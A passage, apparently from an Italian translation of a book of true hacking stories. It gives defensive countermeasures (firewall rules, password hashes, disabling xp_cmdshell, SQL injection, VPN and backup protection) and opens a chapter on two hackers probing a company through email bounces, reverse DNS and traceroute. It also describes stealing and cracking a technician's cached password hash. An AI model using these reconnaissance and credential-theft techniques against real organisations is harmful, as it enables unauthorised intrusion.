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Contromisure 


Nonostante gli attacchi che abbiamo raccontato siano molto 
diversi, è rivelatore notare quante vulnerabilità sono state deter- 
minanti per il successo di entrambi questi hacker e quindi quan- 
te contromisure si possono applicare a entrambi gli attacchi. 

Qui di seguito ecco le principali lezioni che possiamo trarre 
da queste storie. 


Firewall aziendali 


I firewall dovrebbero essere configurati per permettere Fac- 
cesso solo ai servizi essenziali richiesti dalle esigenze della vostra 
attività economica. Bisognerebbe fare un'attenta revisione per as- 
sicurarsi che nessun altro servizio sia accessibile dall’esterno al 
di fuori di quelli effettivamente necessari al vostro business. In 
aggiunta, prendete in considerazione l’idea di usare un “firewall 
di ispezione con memoria di stato”.? (Questo tipo di firewall for- 
nisce una sicurezza maggiore perché mantiene sotto controllo i 
pacchetti per un certo periodo di tempo. I pacchetti in entrata 
vengono accettati solo in risposta a una connessione in uscita. In 
altre parole, il firewall apre i cancelli per porte particolari solo in 
base al traffico uscente.) Inoltre, definite un insieme di regole per 
controllare le connessioni di rete in uscita. L'amministratore del 
firewall dovrebbe revisionare periodicamente la configurazione 
e i log del firewall per assicurarsi che non sia stata fatta alcuna 
modifica non autorizzata. Se un qualche hacker compromette il 
firewall stesso, è estremamente probabile che faccia qualche sot- 
tile modifica in suo favore. 

Inoltre, se possibile, considerate anche la possibilità di con- 
trollare accesso alla Vpn in base all'indirizzo Ip del client. Que- 
sta misura può essere applicata quando un numero limitato di 
dipendenti si connette alla rete aziendale usando la Vpn. Oltre a 
ciò, contemplate la possibilità di implementare una forma più si- 
cura di autenticazione sulla Vpn, come le smart card o dei certi- 
ficati dal lato client, anziché attraverso una Secret Key statica e 
condivisa. 


? “Stateful inspection firewall” nell'originale. I filtri di pacchetto sono nor- 
malmente stateless, cioè senza memoria di stato. La stateful inspection invece 
mantiene informazioni di stato, ovvero informazioni sui pacchetti passati. “La 
stateful inspection richiede solamente il confronto di un pacchetto con il set di 
regole. Se il pacchetto è ammesso, delle informazioni (lo stato) sono aggiunte a 
un database interno. Se le regole per un tipo di servizio richiedono l'esame dei 
dati di un pacchetto, allora parte del pacchetto va esaminata ugualmente.” Vedi 
http://www.ziobudda.net/Recensioni/vedi_recensione.php?ff=33. [N.d.T] 
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Firewall personali 


Erik penetrò nel computer dell'’amministratore delegato e 
scoprì che aveva un firewall personale. Erik non venne blocca- 
to perché sfruttò un servizio permesso dal firewall. Riuscì a in- 
viare dei comandi tramite una “procedura memorizzata”!° abi- 
litata automaticamente dal server Sql di Microsoft. Questo è un 
altro esempio di come si può attaccare un servizio non protetto 
dal firewall. In questo caso la vittima non si preoccupò in nes- 
sun momento di esaminare i voluminosi log del firewall, che con- 
tenevano più di 500 Kb di attività registrata. Questa non è un’ec- 
cezione. Molte organizzazioni impiegano tecnologie di preven- 
zione e rilevamento delle intrusioni e si aspettano che la tecno- 
logia si gestisca da sola e che basti installarla. Come abbiamo vi- 
sto, questo comportamento negligente consente agli hacker di 
continuare indisturbati. 

La lezione è chiara: elaborate attentamente l'insieme delle re- 
gole del firewall in modo che venga filtrato sia il traffico in entrata 
sia quello in uscita sui servizi che non sono essenziali alla vostra at- 
tività. E fate anche in modo di effettuare una revisione periodica 
delle regole del firewall e dei log in modo da rilevare modifiche non 
autorizzate o tentativi di violare la sicurezza del sistema. 

Una volta entrato, è probabile che l’hacker si impadronisca 
di un sistema o di un account inattivo in modo da poter ritorna- 
re in un altro momento. Un'altra tattica è quella di aggiungere 
privilegi o cambiare gruppo di appartenenza ad account che so- 
no già stati craccati. Un modo per identificare possibili intrusio- 
ni o attività interne non autorizzate è appunto quello di realiz- 
zare analisi periodiche degli account, dei gruppi e dei permessi 
dei file. Esiste una gran quantità di strumenti di sicurezza, sia a 
pagamento sia gratuiti, che automatizzano parte di questo pro- 
cesso. Ma visto che anche gli hacker lo sanno, è bene verificare 
periodicamente anche l’integrità di ogni strumento di controllo, 
script e sorgente di dati legata alla sicurezza. 

Molte intrusioni sono il risultato diretto di configurazioni 
scorrette di sistema, quali un eccessivo numero di porte aperte, 
deboli permessi ai file e web server mal configurati. Una volta 
che l’hacker manomette un sistema a livello utente, la mossa suc- 
cessiva sarà aumentarne i privilegi sfruttando vulnerabilità non 
rilevate o non ancora corrette e permessi configurati in modo su- 
perficiale. Non dimenticate: molti degli autori di un attacco in- 
traprendono una serie di passi, piccoli e numerosi, che puntano 
alla manomissione dell'intero sistema. 


10 “Stored procedure” nell'originale. Si tratta di routine memorizzate all’in- 
terno del database che vengono attivate tramite uno specifico statement Sql. Es- 
sendo contenute nel database, queste procedure possono accedere più rapida- 
mente ai dati, che non utilizzando i protocolli di comunicazione. [N.d.T.] 
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Gli amministratori di database che supportano Microsoft Sql 
Server dovrebbero prendere in considerazione l’idea di disabili- 
tare alcune procedure memorizzate (come xp_cmdshell, 
xp_makewebtask e xp_regread) che. possono esser usate per ot- 
tenere ulteriori possibilità di accesso al sistema. 


Port Scanning 


Mentre state leggendo queste righe, è probabile che qualche 
smanettone informatico stia scansionando il vostro computer con- 
nesso a Internet alla ricerca di “qualche frutto facile da cogliere”. 
Visto che il Port Scanning è legale negli Stati Uniti e nella maggior 
parte degli altri paesi, le vostre difese contro gli autori di un at- 
tacco sono in un certo senso limitate. Quindi il fattore cruciale è 
distinguere le minacce serie dalle migliaia di script kiddies che 
scandagliano lo spazio dell'indirizzo della vostra rete. 

Ci sono parecchi prodotti, tra cui i firewall e i sistemi di rile- 
vamento delle intrusioni, che identificano certi tipi di Port Scan- 
ning di porte e possono avvisare il personale preposto su queste 
attività. Oppure che reagiscano bloccando la connessione. Altri 
firewall in commercio prevedono opzioni di configurazione per 
prevenire scansioni di porte molto rapide. Esistono anche stru- 
menti open source che possono operare il Port Scanning e igno- 
rare i pacchetti per un certo periodo di tempo. 


Conosci il tuo sistema 


Qui di seguito trovate elencate un buon numero di operazioni 
di gestione di sistema che andrebbero realizzate abitualmente: 


e Ispezionate l'elenco dei processi attivi per vedere se ci sono 
processi insoliti o sconosciuti. 

e Esaminate l'elenco delle attività programmate per indivi- 
duare aggiunte o modifiche non autorizzate. 

e Analizzate il sistema alla ricerca di file binari di sistema, 
script o applicazioni nuove o sconosciute. 

e Indagate su ogni riduzione insolita dello spazio libero su 
disco. 

e Verificate che tutti gli account di sistema e degli utenti sia- 
no attivi e rimuovete gli account inattivi o sconosciuti. 

e Verificate che gli account speciali installati di default siano 
configurati per rifiutare i log-in interattivi o di rete. 

e Verificate che i permessi di accesso alle cartelle e ai file di 
sistema siano corretti. 
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e Controllate che nei log del sistema non ci sia nessuna stra- 
na attività (come un accesso remoto con origini sconosciute o a 
orari insoliti, durante la notte o nei fine settimana). 

e Tenete sotto controllo i log del web server per individuare 
eventuali richieste di accesso a file non autorizzati. Gli autori di 
un attacco - come abbiamo visto in questo capitolo — copieran- 
no i file su una cartella del web server e li scaricheranno tramite 
il web (http). 

e Se vi servite di ambienti web server che impiegano FrontPage 
o WebDav, assicuratevi che i permessi siano stabiliti correttamente 
in modo da impedire a utenti non autorizzati l’accesso ai file. 


Notificazioni di attacco e allerta 


Sapere che si sta verificando un incidente sul fronte sicurez- 
za può aiutare a limitare i danni. Abilitate il monitoraggio del si- 
stema operativo per individuare possibili falle nella sicurezza. 
Adottate un sistema automatico di avviso all'’amministratore di 
sistema quando si verifica un certo tipo di evento che si è deciso 
di monitorare. Tuttavia, tenete conto che se un attaccante ottie- 
ne dei privilegi sufficienti e si accorge dell’attività di monitorag- 
gio, questo sistema di avviso automatico può essere aggirato. 


Rilevare cambiamenti non autorizzati nelle applicazioni 


Robert riuscì a rimpiazzare l'applicazione helpdesk.exe sfrut- 
tando una cattiva configurazione di FrontPage. Dopo averraggiunto 
l’obiettivo impossessandosi del codice sorgente del prodotto di pun- 
ta dell'azienda, lasciò la versione “hackerata” dell’applicazione di 
supporto helpdesk in modo da poter rientrare in un secondo mo- 
mento. Un amministratore di sistema oberato di lavoro potrà an- 
che non accorgersi mai che un hacker ha modificato di nascosto 
un programma esistente, soprattutto se non vengono effettuati dei 
controlli dell'integrità dei file. Un'alternativa ai controlli manuali è 
acquistare un programma come Tripwire!! che automatizza il pro- 
cesso di rilevamento delle modifiche non autorizzate. 


I permessi 


Erik poté mettere le mani sulle password riservate del data- 
base aprendo i file della cartella “/includes”. Senza queste pass- 


1! Maggiori informazioni su Tripwire sono disponibili sul sito http: 
/www.tripwire.com. 
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word iniziali sarebbe probabilmente stato frenato nella sua mis- 
sione. Tutto ciò di cui aveva bisogno per entrare erano delle pass- 
word riservate del database, che erano esposte in un file sorgen- 
te leggibile dal mondo intero. La prassi più sicura è quella di evi- 
tare di salvare qualunque password in formato di solo testo nei 
file batch, sorgenti o negli script. Andrebbe adottata una politi- 
ca aziendale che proibisca di salvare password in chiaro a meno 
che non sia assolutamente necessario. Come minimo, i file che 
contengono password non crittate devono essere attentamente 
protetti per evitare che vengano rivelate per errore. 

Nell’azienda attaccata da Robert, il server Microsoft IIS4 non 
era stato configurato correttamente per evitare che utenti ano- 
nimi o ospiti potessero aprire e salvare file sulla directory del web 
server. Il file di password esterno usato in combinazione con Mi- 
crosoft Visual SourceSafe era leggibile da ogni utente collegato 
al sistema. A causa di questa cattiva configurazione, Robert riu- 
scì ad assicurarsi il pieno controllo del dominio Windows dell'a- 
zienda. Adottando un sistema con una struttura organizzata di 
directory per le applicazioni e per i dati è probabile che aumen- 
ti l'efficacia del controllo sugli accessi. 


Le password 


Oltre ai normali suggerimenti per la gestione delle password 
che abbiamo dato nel corso di tutto il libro, ci sono ulteriori ele- 
menti che vengono messi in evidenza dal successo degli attacchi 
trattati in questo capitolo. Erik afferma che lui fu in grado di pre- 
vedere la composizione delle altre password dell'azienda a parti- 
re da quelle che era riuscito a craccare. Se la vostra azienda uti- 
lizza metodi standardizzati e prevedibili che i dipendenti sono 
obbligati a seguire per la composizione delle password, allora 
sappiate che state invitando gli hacker a entrare liberamente. 

Una volta che l’autore di un attacco ottiene un accesso privi- 
legiato a un sistema, impossessarsi delle password di altri uten- 
ti o di altri database diventa per lui o lei una priorità. La tattica 
di effettuare ricerche nelle e-mail o nell'intero sistema alla ricer- 
ca di password di solo testo contenute nel corpo di e-mail, script, 
file batch,'2 gli include del codice sorgente!* e fogli di calcolo è 
abbastanza comune. 


12 Un comando batch o file batch è un file di testo che contiene una sequenza 
di comandi per l'interprete di comandi del sistema (solitamente command.com o 
cmd.exe). Il comando batch viene eseguito dall’interprete dei comandi mandando 
in esecuzione, secondo la sequenza specificata, i comandi elencati nel file. Il con- 
cetto di comando batch è analogo a quello di shell script per i sistemi Unix. 

13 Il codice sorgente è un insieme di istruzioni e dati, utilizzati per imple- 
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Le organizzazioni che usano il sistema operativo Windows 
dovrebbero contemplare una configurazione del sistema opera- 
tivo che non conservi nel registro gli hash delle password del Lan 
Manager. Se l’autore dell'attacco acquista i privilegi di accesso 
dell’amministratore, potrà estrarre gli hash delle password e ten- 
tare di craccarle. Il personale dell’It può facilmente configurare 
il sistema in modo che gli hash vecchio stile non vengano salva- 
ti, aumentando notevolmente la difficoltà dell'operazione di crac- 
caggio delle password. Comunque, una volta che l'attaccante “si 
impadronisce” del vostro sistema, può intercettare il traffico da- 
ti o installare un componente o un modulo esterno per ottenere 
le password dei vari account. 

Un'alternativa a disabilitare gli hash delle password del Ma- 
nager della rete locale è comporre le password con un set di ca- 
ratteri non disponibile sulla tastiera usando il tasto <alt> e li- 
dentificatore numerico del caratttere, come descritto nel capito- 
lo 6. I programmi più usati per craccare le password non cerca- 
no di decrittarle usando i caratteri degli alfabeti greco, ebraico, 
latino e arabo. i 


Applicazioni di terzi 


Usando degli strumenti progettati da lui stesso per la scan- 
sione del web, Erik scoprì un file di log senza protezione gene- 
rato da un prodotto Ftp commerciale. Questo log conteneva infor- 
mazioni sull'indirizzo completo dei file che erano stati trasferiti 
sul e dal sistema. Non vi affidate alle configurazioni automatiche 
quando installate software prodotti da terzi. Implementate la con- 
figurazione che con meno probabilità lasci trapelare informa- 
zioni importanti come i dati dei log, che possono essere usati per 
attaccare la rete ancora più in profondità. 


Proteggere le aree condivise 


L'impiego di aree di rete condivise è un metodo diffuso per 
mettere in comune file e cartelle in una rete aziendale. Il perso- 
nale informatico può decidere di non assegnare delle password 


mentare un algoritmo in codice macchina, ossia per costruire un programma ese- 
guibile per computer. Per essere compreso dal computer, il codice sorgente deve 
essere compilato, linkato con le librerie del sistema operativo, quindi eseguito. 
Le direttive di precompilazione nel codice sorgente iniziano con un # e prevedo- 
no l'inserimento di vari file (detti “file di include”) prima che gli script vengano 
eseguiti. [N.d.7.] 
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o delle forme di controllo dell'accesso a queste aree condivise per- 
ché sono accessibili solamente dalla rete interna. Come si è det- 
to nel corso di tutto il libro, numerose organizzazioni concen- 
trano i propri sforzi nel mantenere un alto livello di sicurezza pe- 
rimetrale, ma si occupano poco della sicurezza sul lato interno 
della rete. Gli intrusi che, come Robert, entrano sulla vostra re- 
te interna andranno alla ricerca di aree condivise con nomi che 
promettono informazioni preziose e delicate. Nomi descrittivi co- 
me “ricerca” o “backup” non fanno altro che semplificare note- 
volmente il lavoro dell’hacker. La prassi più indicata è quella di 
proteggere adeguatamente tutte le aree di rete condivise che con- 
tengono informazioni delicate. 


Prevenire la possibilità di indovinare i Dns 


Robert usò un programma in grado di scoprire i nomi dei Dns 
per identificare possibili host all’interno di un file di zona!4 del 
dominio pubblicamente accessibili. Potete evitare di far scopri- 
re i nomi degli host interni implementando il cosiddetto Dns “a 
orizzonte diviso”,!5 che ha sia un nome di server interno che ester- 
no. Solo gli host pubblici vengono indicati nel file di zona del no- 
me del server esterno. Il server interno, protetto molto meglio da 
possibili attacchi, viene usato per risolvere le richieste interne di 


Dns per la rete aziendale. 


Proteggere i server Sql Microsoft 


Erik trovò un server di posta e web di backup sul quale girava 
Microsoft Server Sql e i cui account e password erano gli stessi che 
aveva individuato nei file del codice sorgente della cartella “inclu- 
de”. Il server Sql non doveva essere messo su Internet senza una 
legittima necessità commerciale. Anche se l'account “SA” era sta- 
to rinominato, l’autore dell'attacco individuò il nuovo nome e la 
password dell'account in un file di codice sorgente non protetto. 
La prassi più sicura è quella di filtrare la porta 1433 (Microsoft Sql 
Server) a meno che non sia assolutamente necessaria. 


14 Un file allocato nella cartella principale di un server che contiene i dati di 
registrazione dei domini. [N.d.7.] 
!5 Vedi anche il capitolo 5. [N.d.7.] 
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Proteggere file delicati 


Gli attacchi raccontati in questo capitolo andarono in porto 

perché il codice sorgente era conservato su server non adegua- 
tamente protetti. In contesti estremamente delicati come il set- 
tore ricerca e sviluppo di un'azienda o il gruppo degli sviluppa- 
tori, un ulteriore livello di sicurezza potrebbe essere rappresen- 
tato dall'adozione di tecnologie di crittazione. 
__Unaltro metodo utile per il singolo sviluppatore (ma proba- 
bilmente poco pratico in un gruppo di lavoro in cui un certo nu- 
mero di persone ha bisogno di accedere al codice sorgente del 
prodotto in corso di sviluppo) sarebbe quello di crittare dati mol- 
to delicati, come appunto il codice sorgente attraverso prodotti 
come Pgp Disk o Pgp Corporate Disk. Questi software creano di- 
schi virtuali crittati, ma comunque funzionano in modo tale che 
il processo rimane visibile per l'utente. 


Proteggere i backup 


Risulta evidente da queste storie che è facile che i dipen- 
denti - anche i più scrupolosi sulle questioni di sicurezza — sot- 
tovalutino la necessità di proteggere correttamente i file di 
backup, comprese le copie delle e-mail, affinché non possano 
essere aperti da personale non autorizzato. Durante la mia pre- 
cedente carriera di hacker, scoprii che molti amministratori di 
sistema lasciavano senza protezione gli archivi compressi di car- 
telle contenenti dati sensibili. E quando lavoravo nel diparti- 
mento informatico di un grande ospedale, notai che veniva re- 
golarmente eseguita una copia di sicurezza del database delle 
buste paga che veniva però lasciata senza alcuna protezione, 
sicché un qualsiasi membro del personale sufficientemente 
esperto avrebbe potuto accedervi. 

Robert approfittò di un altro aspetto di questa comune svista 
quando trovò i backup del codice sorgente dell’applicazione com- 
merciale che gestiva la mailing list abbandonati in una cartella 
pubblica sul server web. 


Proteggersi contro gli attacchi a Sql Injection 


Robertrimosse intenzionalmente dall’applicazione webi con- 
trolli di validità dei dati inseriti, che erano stati progettati pro- 
prio per impedire un attacco a Sql Injection. I passi fondamen- 
tali qui indicati possono evitare che la vostra azienda sia ogget- 
to dello stesso tipo di attacco portato da Robert: 
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e Non attivate mai un server Microsoft Sql nel contesto di si- 
stema. Cercate di farlo girare sotto un altro account. 

e Quando sviluppate dei programmi, scrivete del codice che 
non generi richieste Sql dinamiche. 

e Utilizzate le procedure memorizzate (“stored procedures”) 
per eseguire richieste Sql. Aprite un account che sia usato solo 
per eseguire tali procedure interne e concedetegli solo i permes- 
si di cui ha bisogno per realizzare il compito richiesto. 


Usare i servizi di Microsoft Vpn 


Come strumento di riconoscimento Microsoft Vpn usa Fau- 
tenticazione di Windows, rendendo più facile per un intruso at- 
taccare delle password deboli ottenendo così l'accesso alla Vpn. 

‘ In certi ambienti può essere appropriato richiedere che lauten- 
ticazione per la Vpn avvenga tramite smart card; la Vpn è infat- 
ti un’altra di quelle zone in cui una forma di autenticazione di- 
versa da un semplice “Shared Secret” può innalzare di vari pun- 
ti il livello di sicurezza. In alcuni casi può essere consigliabile 
controllare l’accesso alla Vpn in base all'indirizzo Ip del client. 

Nel caso dell'attacco di Robert, l'amministratore di sistema 
avrebbe dovuto monitorare il server Vpn perché nessun nuovo 
utente venisse aggiunto al gruppo di utenti della Vpn. Altre mi- 
sure — già ricordate in precedenza - comprendono la rimozione 
dal sistema degli account inattivi; l'attivazione di un processo di 
rimozione o disabilitazione degli account di dipendenti in par- 
tenza; e, dove non sia un impedimento, la limitazione delle con- 
nessioni dial-up e alla Vpn in determinati giorni della settimana 
e ore del giorno. 


Rimozione dei file di installazione 


Robert riuscì a ottenere la mailing list che cercava non at- 
taccando l'applicazione stessa, ma approfittando della vulnera- 
bilità dello script di default di installazione. Una volta che un'ap- 
plicazione è stata installata con successo, gli script di installa- 
zione andrebbero rimossi. 


Rinominare gli account dell'amministratore 
Chiunque abbia una connessione a Internet può digitare su 


Google le parole chiave “default password list” e trovare una serie 
di siti che elencano account e password automatiche così come 
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escono dalla linea di produzione. Di conseguenza è buona norma 
rinominare se possibile gli account di visitatore e di amministra- 
tore. Questa accortezza tuttavia perde ogni valore quando il nome 
e la password dell'account vengono conservate in chiaro, come ap- 
punto successe con l'azienda descritta nell'attacco di Erik.!9 


Rafforzare Windows per evitare che conservi certe credenziali 


La configurazione preassegnata di Windows salva automati- 
camente nella cache gli hash delle password e conserva le pass- 
word di solo testo usate per connettersi in dial-up. Dopo aver ot- 
tenuto i privilegi necessari, l'attaccante cercherà di estrarre più 
informazioni possibili, comprese le password che sono state sal- 
vate nel registro o in altre aree del sistema. 

Un dipendente fidato può potenzialmente compromettere un 
intero dominio utilizzando un po’ di ingegneria sociale nel mo- 
mento in cui la sua postazione di lavoro salva delle password nel- 
la cache locale. Il nostro dipendente chiama scocciato il suppor- 
to tecnico lamentandosi di non riuscire a entrare nella sua mac- 
china. Richiede un tecnico che venga immediatamente a dargli 
assistenza. Arriva il tecnico, che entra nel computer usando le 
sue credenziali e risolve il “problema”. Subito dopo il dipenden- 
te estrae l’hash della password del tecnico e la decritta, asse- 
gnandosi così gli stessi diritti di amministratore di dominio del 
tecnico. 

Una quantità di programmi - come Internet Explorer e Out- 
look — salvano le password nella cache del registro. Per saperne 
di più su come disabilitare questa funzione, cercate con Google 

“disable password caching”. 


Difendersi a fondo 


Le storie di questo capitolo dimostrano, ancora più chiara- 
mente delle altre, che sorvegliare il perimetro elettronico della 
rete della vostra azienda non è abbastanza. Nel contesto odierno 
tale perimetro si sta dissolvendo mano a mano che le società in- 
vitano gli utenti sulla propria rete. Di per sé il firewall non è quin- 
di in grado di fermare ogni attacco. L'hacker cercherà la crepa 
nel muro, tentando di sfruttare un servizio autorizzato dalle re- 


16 Un noto sito che gli hacker usano per controllare siti che utilizzano pas- 
sword di default è http:/www.phenoelit.de/dpl/dpl.html. Se la vostra azienda è 
nell'elenco, siete avvisati. 
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gole del firewall. Una strategia per mitigare questo rischio è quel- 
la di sistemare tutti i sistemi accessibili al pubblico su un loro 
segmento di rete e filtrare attentamente il traffico verso altri seg- 
menti più delicati. 

Per esempio, se sulla rete aziendale esiste un server Sql di 
backend, potete installare un secondo firewall che permetta so- 
lo le connessioni alla porta utilizzata dal servizio. Installare 
firewall interni per proteggere informazioni sensibili può essere 
una discreta seccatura, ma dovrebbe essere considerato impre- 
scindibile se volete davvero proteggere i vostri dati da dipenden- 
ti malintenzionati o da intrusi che riescono a perforare il peri- 
‘metro di sicurezza. 


Conclusioni 


Gli intrusi più determinati non si fermeranno di fronte a nien- 
‘te pur di raggiungere i propri obiettivi. Un intruso paziente per-. 
lustrerà la rete prescelta prendendo nota di tutti i sistemi acces- 
sibili e dei relativi servizi esposti al pubblico. L'hacker potrà re- 
stare in attesa per settimane, mesi o persino anni per trovare un 
nuovo punto debole e attaccare. Durante la mia precedente car- 
riera di hacker perdevo ore e ore a compromettere i sistemi. La 
mia perseveranza pagava, visto che sono sempre riuscito a tro- 
vare la crepa nel muro. 

L'hacker Erik dimostrò la stessa perseveranza e determina- 
zione nei suoi sforzi per ottenere, nel giro di due anni, il pregia- 
tissimo codice sorgente. E pure Robert intraprese una comples- 
sa e intricata serie di mosse sia nei suoi tentativi mirati di ruba- 
re milioni di indirizzi e-mail da vendere agli spammer, sia nello 
sforzo di ottenere, come Erik, il codice sorgente cui puntava. 

Capirete che questi due hacker non sono assolutamente casi 
isolati. Il loro grado di costanza non è raro nella comunità degli 
hacker. I responsabili della sicurezza di un’infrastruttura devono 
capire chi potrebbero trovarsi di fronte. Un hacker ha a disposi- 
zione un tempo illimitato per trovare anche un solo buco, men- 
tre gli amministratori di sistema e di rete oberati di lavoro han- 
no un tempo assai limitato per concentrarsi sullo specifico com- 
pito di puntellare le difese della loro organizzazione. 

Come scrisse in modo così chiaro Sun Tzu nell'Arte della guer- 
ra!: “Conosci te stesso e conosci il tuo nemico: in cento battaglie 
non sarai mai in pericolo. Quando non conosci il nemico ma co- 
nosci te stesso, le tue possibilità di vincere o perdere si equival- 


17 Sun Tzu, L'arte della guerra, Neri Pozza, Milano 2005. 
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gono...”. Il messaggio è chiaro: i vostri avversari si prenderanno 
tutto il tempo necessario pur di ottenere quello che vogliono. Di 
conseguenza dovreste fare una valutazione del rischio per indi- 
viduare le probabili minacce alla vostra organizzazione, e tali mi- 
nacce dovrebbero essere prese in considerazione al momento di 
sviluppare una strategia di sicurezza. Se sarete sempre prepara- 
ti e attuerete un livello “standard di attenzioni dovute” definen- 
do, implementando e mettendo in pratica dei regolamenti di si- 
curezza, avrete fatto molto per tenere‘al palo gli autori di un pos- 
sibile attacco. 

A dire tutta la verità, qualsiasi avversario dotato di risorse suf- 
ficienti alla fine può riuscire a entrare, ma il vostro obiettivo do- 
vrebbe essere quello di rendergli la sfida così difficile e compli- 
cata da non valerne la pena. 


226 


9. 
Sul continente 


Hai davanti questi piccoli frammenti di infor- 
mazione e il modo in cui le cose sono collegate, 
e inizi a farti un'idea dell'azienda e dei respon- 
sabili dell’It. E avevamo questa specie di sensa- 
zione che ne sapevano di sicurezza, ma che for- 
se stavano commettendo qualche piccolo errore. 


Louis 


All’inizio del capitolo precedente, abbiamo avvisato i lettori 
non tecnici che potrebbero trovare difficili alcuni passaggi del li- 
bro. Il che è ancora più vero per quanto segue. Tuttavia sarebbe 
un peccato saltare il capitolo perché la storia è affascinante da 
molti punti di vista. E la sostanza può essere comunque colta fa- 
cendo a meno dei dettagli tecnici. 

Questa è la storia di un gruppo di persone affini: lavorano per 
un'azienda che fu assunta per hackerare un obiettivo senza es- 
sere individuata. 


Da qualche parte a Londra 


L'ambientazione è nella City, nel cuore di Londra. 

Immaginate “una grande sala aperta quasi senza finestre, nel 
retro di un edificio, con degli smanettoni che fanno gruppo”. Pen- 
sate a degli “hacker ritirati dalla società, che non sono influen- 
zati dal mondo esterno”, ognuno dei quali lavora febbrilmente 
alla sua scrivania, ma senza rinunciare a conversare in allegria. 

Tra di loro, in questa stanza anonima, siede un tipo che chia- 
meremo Louis. Louis è cresciuto in una cittadina remota nel nord 
dell'Inghilterra. Iniziò a smanettare con i computer a circa otto 
anni, quando i suoi genitori acquistarono una vecchia macchina 
perché i figli potessero iniziare a studiare la tecnologia. La sua 
prima esperienza con l’hacking la fece a scuola quando gli capitò 
tra le mani una stampata con i nomi utenti e le password del per- 
sonale; la cosa accese la sua curiosità. L'hacking lo mise presto 
in difficoltà, quando uno studente più grande (un “perfetto”, se- 
condo la terminologia inglese) lo denunciò. Ma l'essere scoperto 
non lo trattenne dall’imparare i segreti dei computer. 

Adesso che è cresciuto d'altezza, Louis non ha più molto tem- 
po per “i veri sport inglesi” — il cricket e il calcio ~ cui ha dato tan- 
ta importanza quando andava a scuola. 
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Tuffarsi 


Un po’ di tempo fa, Louis e il suo amico Brock, lavorando os- 
sessivamente su un computer che avevano sottomano, si imbar- 
carono insieme in un progetto. Il loro obiettivo era un'azienda di 
un paese europeo — sostanzialmente un'impresa di sicurezza che 
trasferiva grosse somme di denaro, oltre che i prigionieri tra car- 
ceri e tribunali, e da una prigione all’altra. (L'idea di una compa- 
gnia che fa un lavoro delicato come il trasferire denaro e prigio- 
nieri è una novità che fa pensare gli americani, ma è un tipo di 
soluzione che gli inglesi e gli europei danno per scontata.) 

Qualsiasi compagnia che si descrive utilizzando la parola 
“sicurezza” deve apparire come una sfida particolarmente in- 
teressante. Se si occupano di sicurezza, significa che sono tal- 
mente esperti che non c'è modo di infiltrarli? Per un qualsiasi 
gruppo di persone con una mentalità da hacker, la sfida deve 
apparire irresistibile, soprattutto quando, come in questo caso, 
i due non avevano niente con cui iniziare, al di là del nome del- 
la loro compagnia. 

“Lo affrontammo come un problema da risolvere. Così, il pri- 
mo passo consisteva nello scoprire il maggior numero di infor- 
mazioni possibili su questa azienda,” dice Louis. Iniziarono con 
l’inserire il nome della compagnia su Google, e utilizzarono il mo- 
tore di ricerca anche per le traduzioni, poiché nessuno del grup- 
po parlava la lingua di quel paese. 

Le traduzioni automatiche si avvicinavano abbastanza all’o- 
riginale da dar loro un’idea dell'azienda e di quanto fosse gran- 
de. Anche se non si sentono molto a loro agio con gli attacchi di 
social engineering, l'opzione fu depennata in ogni caso a causa 
della barriera linguistica. 

Riuscirono a mappare lo spettro di indirizzi Ip assegnati pub- 
blicamente all’organizzazione, dagli indirizzi Ip del sito web del- 
l'azienda e del loro server di posta, e anche dall’authority euro- 
pea per l'assegnazione degli Ip, la Ripe, che è simile ad Arin ne- 
gli Stati Uniti. (L'American Registry of Internet Numbers, o Arin, 
è l’organizzazione che gestisce i numeri degli indirizzi Ip per gli 
Stati Uniti e i relativi territori. Poiché gli indirizzi Internet devo- 
no essere unici, c'è bisogno che alcune organizzazioni controlli- 
no e assegnino i blocchi di numeri di indirizzi Ip. La Reseaux Ip 
Europeens, o Ripe, gestisce gli indirizzi Ip per i territori europei.) 

Vennero a sapere che il sito web principale era gestito ester- 
namente da un'azienda di hosting. Ma l'indirizzo Ip del loro ser- 
ver di posta era stato registrato dalla compagnia stessa ed era al- 
locato all’interno del loro blocco di indirizzi aziendali. Così, il 
gruppo poté interrogare il Nome di dominio del server (Dns) per 
ottenere gli indirizzi Ip esaminando i dati contenuti nello scam- 
bio della posta. p 4 
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Louis provò la tecnica di spedire un'e-mail a un indirizzo non 
esistente. Il messaggio sarebbe tornato indietro avvisandolo che 
la sua e-mail non poteva essere consegnata e gli avrebbe mostrato 
delle informazioni nell’intestazione che avrebbero rivelato alcu- 
ni indirizzi Ip interni della compagnia, e alcune informazioni per 
linstradamento dei dati. 

Tuttavia in questo caso quello che Louis ottenne fu un “rim- 
balzo” (bounce) dalla loro casella di posta esterna; la sua e-mail 
era arrivata solo al server di posta esterno e così la risposta “in- 
consegnabile” non gli restituì nessuna informazione utile. 

Brock e Louis sapevano che l'operazione sarebbe stata più sem- 
plice se la compagnia avesse ospitato il suo Dns. In quel caso avreb- 
bero cercato di fare delle ricerche per ottenere più informazioni sul- 
la rete interna della compagnia o per sfruttare qualsiasi vulnerabi- 
lità associata alla loro versione del Dns. La notizia non era buona: 
il loro Dns si trovava altrove, probabilmente allocato presso il loro 
Isp (o, per usare un'espressione inglese, la loro “telecom”). 


Mappare la rete 


Come passo successivo, Louis e Brock applicarono un Re- 
verse Scanning del Dns per ottenere i nomi degli host dei vari si- 
stemi situati all’interno del blocco di indirizzi della compagnia 
(come spiegato nel capitolo 4 e altrove). Per farlo, Louis usò “un 
semplice programmino in Perl” scritto dai due. (Di solito, chi at- 
tacca usa i software o i siti disponibili per la ricerca dei Reverse 
Dns, come http://www.samspade.org.) 

Notarono che “da alcuni dei sistemi tornavano indietro dei 
nomi ricchi di informazioni”, che erano indizi sulle funzioni di 
questi sistemi all’interno della compagnia. Indizi che fornivano 
anche indicazioni sulla mentalità degli informatici dell’azienda. 
“Sembrava come se gli amministratori non avessero un control- 
lo pieno delle informazioni disponibili sulla loro rete, e questo è 
il primo livello in cui intuisci se riuscirai a entrare o no.” Brock 
e Louis pensarono che i segnali fossero favorevoli. 

Questo è un esempio di come si può provare a psicoanaliz- 
zare gli amministratori di rete, cercare di entrare nelle loro teste 
per capire come organizzano l'architettura di rete. Nel caso de- 
gli autori del nostro attacco, il tentativo “si basava sulla cono- 
scenza che avevamo accertato delle reti e delle compagnie in quel 
particolare paese europeo, sul livello locale di conoscenza dell'It 
e sul fatto che la gente in quel paese era forse un anno e mezzo 
o due in ritardo rispetto alla Gran Bretagna”. 
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Identificare un router 


Analizzarono la rete usando la variante Unix di “traceroute”, 
un'applicazione che conta i numeri di router attraverso cui tran- 
sitano i pacchetti di dati per raggiungere una destinazione spe- 
